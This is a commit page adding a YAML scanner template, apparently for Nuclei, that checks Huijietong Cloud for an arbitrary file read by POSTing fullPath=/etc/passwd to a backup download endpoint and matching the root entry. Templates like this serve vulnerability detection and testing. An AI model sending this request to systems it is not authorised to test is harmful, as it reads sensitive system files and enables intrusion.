Merge pull request #1871 from projectdiscovery/huijietong-cloud-fileread
Create huijietong-cloud-fileread.yamlpatch-1
commit
5182b88b54
|
@ -0,0 +1,23 @@
|
|||
id: huijietong-cloud-fileread
|
||||
info:
|
||||
name: Huijietong Cloud File Read
|
||||
author: princechaddha
|
||||
severity: high
|
||||
tags: huijietong,lfi
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
|
||||
body: 'fullPath=/etc/passwd'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
Loading…
Reference in New Issue